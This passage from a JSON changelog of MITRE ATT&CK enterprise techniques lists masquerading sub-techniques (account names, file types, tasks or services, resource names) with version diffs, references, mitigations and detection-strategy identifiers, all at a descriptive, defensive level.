                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:38:13.564000+00:00\", \"old_value\": \"2025-10-24 17:49:15.520000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1045: Code Signing"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0031: Invalid Code Signature Execution Detection via Metadata and Behavioral Context"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-08-05 21:39:16.274000+00:00",
                    "modified": "2026-04-17 14:21:43.719000+00:00",
                    "name": "Masquerade Account Name",
                    "description": "Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during [Create Account](https://attack.mitre.org/techniques/T1136), although accounts may also be renamed at a later date. This may also coincide with [Account Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first deletes an account before re-creating one with the same name.(Citation: Huntress MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts, such as those associated with legitimate software, data backups, or container cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec Kubernetes Attack 2023) They may also give accounts generic, trustworthy names, such as \u201cadmin\u201d, \u201chelp\u201d, or \u201croot.\u201d(Citation: Invictus IR Cloud Ransomware 2024) Sometimes adversaries may model account names off of those already existing in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).  \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1684/001), which describes impersonating specific trusted individuals or organizations, rather than user or service account names.  ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1036/010",
                            "external_id": "T1036.010"
                        },
                        {
                            "source_name": "Elastic CUBA Ransomware 2022",
                            "description": "Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved August 5, 2024.",
                            "url": "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis"
                        },
                        {
                            "source_name": "Invictus IR Cloud Ransomware 2024",
                            "description": "Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved August 5, 2024.",
                            "url": "https://www.invictus-ir.com/news/ransomware-in-the-cloud"
                        },
                        {
                            "source_name": "Huntress MOVEit 2023",
                            "description": "John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.",
                            "url": "https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response"
                        },
                        {
                            "source_name": "Aquasec Kubernetes Attack 2023",
                            "description": "Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14, 2023.",
                            "url": "https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Menachem Goldstein"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers",
                        "IaaS",
                        "Identity Provider",
                        "Linux",
                        "macOS",
                        "Office Suite",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 14:21:43.719000+00:00\", \"old_value\": \"2025-04-15 22:48:14.966000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during [Create Account](https://attack.mitre.org/techniques/T1136), although accounts may also be renamed at a later date. This may also coincide with [Account Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first deletes an account before re-creating one with the same name.(Citation: Huntress MOVEit 2023)\\n\\nOften, adversaries will attempt to masquerade as service accounts, such as those associated with legitimate software, data backups, or container cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec Kubernetes Attack 2023) They may also give accounts generic, trustworthy names, such as \\u201cadmin\\u201d, \\u201chelp\\u201d, or \\u201croot.\\u201d(Citation: Invictus IR Cloud Ransomware 2024) Sometimes adversaries may model account names off of those already existing in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).  \\n\\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1684/001), which describes impersonating specific trusted individuals or organizations, rather than user or service account names.  \", \"old_value\": \"Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during [Create Account](https://attack.mitre.org/techniques/T1136), although accounts may also be renamed at a later date. This may also coincide with [Account Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first deletes an account before re-creating one with the same name.(Citation: Huntress MOVEit 2023)\\n\\nOften, adversaries will attempt to masquerade as service accounts, such as those associated with legitimate software, data backups, or container cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec Kubernetes Attack 2023) They may also give accounts generic, trustworthy names, such as \\u201cadmin\\u201d, \\u201chelp\\u201d, or \\u201croot.\\u201d(Citation: Invictus IR Cloud Ransomware 2024) Sometimes adversaries may model account names off of those already existing in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).  \\n\\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656), which describes impersonating specific trusted individuals or organizations, rather than user or service account names.  \", \"diff\": \"--- \\n+++ \\n@@ -2,4 +2,4 @@\\n \\n Often, adversaries will attempt to masquerade as service accounts, such as those associated with legitimate software, data backups, or container cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec Kubernetes Attack 2023) They may also give accounts generic, trustworthy names, such as \\u201cadmin\\u201d, \\u201chelp\\u201d, or \\u201croot.\\u201d(Citation: Invictus IR Cloud Ransomware 2024) Sometimes adversaries may model account names off of those already existing in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).  \\n \\n-Note that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656), which describes impersonating specific trusted individuals or organizations, rather than user or service account names.  \\n+Note that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1684/001), which describes impersonating specific trusted individuals or organizations, rather than user or service account names.  \"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to33__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to33__0\"><a href=\"#difflib_chg_to33__top\">t</a></td><td class=\"diff_header\" id=\"from33_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;match&nbsp;or&nbsp;approximate&nbsp;the&nbsp;names&nbsp;of&nbsp;legitimate</td><td class=\"diff_next\"><a href=\"#difflib_chg_to33__top\">t</a></td><td class=\"diff_header\" id=\"to33_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;match&nbsp;or&nbsp;approximate&nbsp;the&nbsp;names&nbsp;of&nbsp;legitimate</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;accounts&nbsp;to&nbsp;make&nbsp;newly&nbsp;created&nbsp;ones&nbsp;appear&nbsp;benign.&nbsp;This&nbsp;wil</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;accounts&nbsp;to&nbsp;make&nbsp;newly&nbsp;created&nbsp;ones&nbsp;appear&nbsp;benign.&nbsp;This&nbsp;wil</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">l&nbsp;typically&nbsp;occur&nbsp;during&nbsp;[Create&nbsp;Account](https://attack.mit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">l&nbsp;typically&nbsp;occur&nbsp;during&nbsp;[Create&nbsp;Account](https://attack.mit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re.org/techniques/T1136),&nbsp;although&nbsp;accounts&nbsp;may&nbsp;also&nbsp;be&nbsp;rena</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re.org/techniques/T1136),&nbsp;although&nbsp;accounts&nbsp;may&nbsp;also&nbsp;be&nbsp;rena</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">med&nbsp;at&nbsp;a&nbsp;later&nbsp;date.&nbsp;This&nbsp;may&nbsp;also&nbsp;coincide&nbsp;with&nbsp;[Account&nbsp;Ac</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">med&nbsp;at&nbsp;a&nbsp;later&nbsp;date.&nbsp;This&nbsp;may&nbsp;also&nbsp;coincide&nbsp;with&nbsp;[Account&nbsp;Ac</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cess&nbsp;Removal](https://attack.mitre.org/techniques/T1531)&nbsp;if&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cess&nbsp;Removal](https://attack.mitre.org/techniques/T1531)&nbsp;if&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">the&nbsp;actor&nbsp;first&nbsp;deletes&nbsp;an&nbsp;account&nbsp;before&nbsp;re-creating&nbsp;one&nbsp;wi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">the&nbsp;actor&nbsp;first&nbsp;deletes&nbsp;an&nbsp;account&nbsp;before&nbsp;re-creating&nbsp;one&nbsp;wi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">th&nbsp;the&nbsp;same&nbsp;name.(Citation:&nbsp;Huntress&nbsp;MOVEit&nbsp;2023)&nbsp;&nbsp;Often,&nbsp;ad</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">th&nbsp;the&nbsp;same&nbsp;name.(Citation:&nbsp;Huntress&nbsp;MOVEit&nbsp;2023)&nbsp;&nbsp;Often,&nbsp;ad</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">versaries&nbsp;will&nbsp;attempt&nbsp;to&nbsp;masquerade&nbsp;as&nbsp;service&nbsp;accounts,&nbsp;su</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">versaries&nbsp;will&nbsp;attempt&nbsp;to&nbsp;masquerade&nbsp;as&nbsp;service&nbsp;accounts,&nbsp;su</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ch&nbsp;as&nbsp;those&nbsp;associated&nbsp;with&nbsp;legitimate&nbsp;software,&nbsp;data&nbsp;backup</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ch&nbsp;as&nbsp;those&nbsp;associated&nbsp;with&nbsp;legitimate&nbsp;software,&nbsp;data&nbsp;backup</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s,&nbsp;or&nbsp;container&nbsp;cluster&nbsp;management.(Citation:&nbsp;Elastic&nbsp;CUBA&nbsp;R</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s,&nbsp;or&nbsp;container&nbsp;cluster&nbsp;management.(Citation:&nbsp;Elastic&nbsp;CUBA&nbsp;R</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ansomware&nbsp;2022)(Citation:&nbsp;Aquasec&nbsp;Kubernetes&nbsp;Attack&nbsp;2023)&nbsp;Th</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ansomware&nbsp;2022)(Citation:&nbsp;Aquasec&nbsp;Kubernetes&nbsp;Attack&nbsp;2023)&nbsp;Th</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ey&nbsp;may&nbsp;also&nbsp;give&nbsp;accounts&nbsp;generic,&nbsp;trustworthy&nbsp;names,&nbsp;such&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ey&nbsp;may&nbsp;also&nbsp;give&nbsp;accounts&nbsp;generic,&nbsp;trustworthy&nbsp;names,&nbsp;such&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;\u201cadmin\u201d,&nbsp;\u201chelp\u201d,&nbsp;or&nbsp;\u201croot.\u201d(Citation:&nbsp;Invictus&nbsp;IR&nbsp;Cloud&nbsp;Ra</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;\u201cadmin\u201d,&nbsp;\u201chelp\u201d,&nbsp;or&nbsp;\u201croot.\u201d(Citation:&nbsp;Invictus&nbsp;IR&nbsp;Cloud&nbsp;Ra</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nsomware&nbsp;2024)&nbsp;Sometimes&nbsp;adversaries&nbsp;may&nbsp;model&nbsp;account&nbsp;names</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nsomware&nbsp;2024)&nbsp;Sometimes&nbsp;adversaries&nbsp;may&nbsp;model&nbsp;account&nbsp;names</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;off&nbsp;of&nbsp;those&nbsp;already&nbsp;existing&nbsp;in&nbsp;the&nbsp;system,&nbsp;as&nbsp;a&nbsp;follow-on</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;off&nbsp;of&nbsp;those&nbsp;already&nbsp;existing&nbsp;in&nbsp;the&nbsp;system,&nbsp;as&nbsp;a&nbsp;follow-on</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;behavior&nbsp;to&nbsp;[Account&nbsp;Discovery](https://attack.mitre.org/te</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;behavior&nbsp;to&nbsp;[Account&nbsp;Discovery](https://attack.mitre.org/te</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">chniques/T1087).&nbsp;&nbsp;&nbsp;&nbsp;Note&nbsp;that&nbsp;this&nbsp;is&nbsp;distinct&nbsp;from&nbsp;[Imperso</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">chniques/T1087).&nbsp;&nbsp;&nbsp;&nbsp;Note&nbsp;that&nbsp;this&nbsp;is&nbsp;distinct&nbsp;from&nbsp;[Imperso</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nation](https://attack.mitre.org/techniques/T16<span class=\"diff_chg\">56</span>),&nbsp;which&nbsp;de</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nation](https://attack.mitre.org/techniques/T16<span class=\"diff_chg\">84/001</span>),&nbsp;whic</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">scribes&nbsp;impersonating&nbsp;specific&nbsp;trusted&nbsp;individuals&nbsp;or&nbsp;organi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">h&nbsp;describes&nbsp;impersonating&nbsp;specific&nbsp;trusted&nbsp;individuals&nbsp;or&nbsp;or</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">zations,&nbsp;rather&nbsp;than&nbsp;user&nbsp;or&nbsp;service&nbsp;account&nbsp;names.&nbsp;&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ganizations,&nbsp;rather&nbsp;than&nbsp;user&nbsp;or&nbsp;service&nbsp;account&nbsp;names.&nbsp;&nbsp;</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0383: Detection Strategy for Masquerading via Account Name Similarity"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-03-08 22:40:06.918000+00:00",
                    "modified": "2026-04-15 20:39:13.971000+00:00",
                    "name": "Masquerade File Type",
                    "description": "Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file\u2019s signature, extension, icon, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file\u2019s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file\u2019s type. For example, the header of a JPEG file,  is <code> 0xFF 0xD8</code> and the file extension is either `.JPE`, `.JPEG` or `.JPG`. \n\nAdversaries may edit the header\u2019s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections. \n\nCommon non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign.  Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of <code>test.gif</code>. A user may not know that a file is malicious due to the benign appearance and file extension.\n\nPolyglot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1036/008",
                            "external_id": "T1036.008"
                        },
                        {
                            "source_name": "polygot_icedID",
                            "description": "Lim, M. (2022, September 27). More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID. Retrieved September 29, 2022.",
                            "url": "https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Ben Smith",
                        "CrowdStrike Falcon OverWatch"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:39:13.971000+00:00\", \"old_value\": \"2025-10-08 17:44:11.183000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention",
                            "M1040: Behavior Prevention on Endpoint",
                            "M1049: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0226: Detection Strategy for Masquerading via File Type Modification"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-10 20:30:07.426000+00:00",
                    "modified": "2026-04-15 20:39:39.311000+00:00",
                    "name": "Masquerade Task or Service",
                    "description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1036/004",
                            "external_id": "T1036.004"
                        },
                        {
                            "source_name": "Fysbis Dr Web Analysis",
                            "description": "Doctor Web. (2014, November 21). Linux.BackDoor.Fysbis.1. Retrieved December 7, 2017.",
                            "url": "https://vms.drweb.com/virus/?i=4276269"
                        },
                        {
                            "source_name": "Palo Alto Shamoon Nov 2016",
                            "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
                            "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
                        },
                        {
                            "source_name": "Systemd Service Units",
                            "description": "Freedesktop.org. (n.d.). systemd.service \u2014 Service unit configuration. Retrieved March 16, 2020.",
                            "url": "https://www.freedesktop.org/software/systemd/man/systemd.service.html"
                        },
                        {
                            "source_name": "TechNet Schtasks",
                            "description": "Microsoft. (n.d.). Schtasks. Retrieved April 28, 2016.",
                            "url": "https://technet.microsoft.com/en-us/library/bb490996.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:39:39.311000+00:00\", \"old_value\": \"2025-10-24 17:49:00.215000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0117: Detection of Masqueraded Tasks or Services with Suspicious Naming and Execution"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-10 20:43:10.239000+00:00",
                    "modified": "2026-04-15 20:39:41.881000+00:00",
                    "name": "Match Legitimate Resource Name or Location",
                    "description": "Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the sake of evading defenses and observation. \n\nThis may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: `svchost.exe`). Alternatively, a Windows Registry key may be given a close approximation to a key used by a legitimate program. In containerized environments, a threat actor may create a resource in a trusted namespace or one that matches the naming convention of a container pod or cluster.(Citation: Aquasec Kubernetes Backdoor 2023)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1036/005",
                            "external_id": "T1036.005"
                        },
                        {
                            "source_name": "Aquasec Kubernetes Backdoor 2023",
                            "description": "Michael Katchinskiy and Assaf Morag. (2023, April 21). First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved March 24, 2025.",
                            "url": "https://www.aquasec.com/blog/leveraging-kubernetes-rbac-to-backdoor-clusters/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Vishwas Manral, McAfee",
                        "Yossi Weizman, Azure Defender Research Team"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers",
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:39:41.881000+00:00\", \"old_value\": \"2025-10-24 17:48:28.950000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Twitter ItsReallyNick Masquerading Update\", \"description\": \"Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved September 12, 2024.\", \"url\": \"https://x.com/ItsReallyNick/status/1055321652777619457\"}, \"root['external_references'][2]\": {\"source_name\": \"Docker Images\", \"description\": \"Docker. (n.d.). Docker Images. Retrieved April 6, 2021.\", \"url\": \"https://docs.docker.com/engine/reference/commandline/images/\"}, \"root['external_references'][3]\": {\"source_name\": \"Elastic Masquerade Ball\", \"description\": \"Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.\", \"url\": \"https://www.elastic.co/blog/how-hunt-masquerade-ball\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
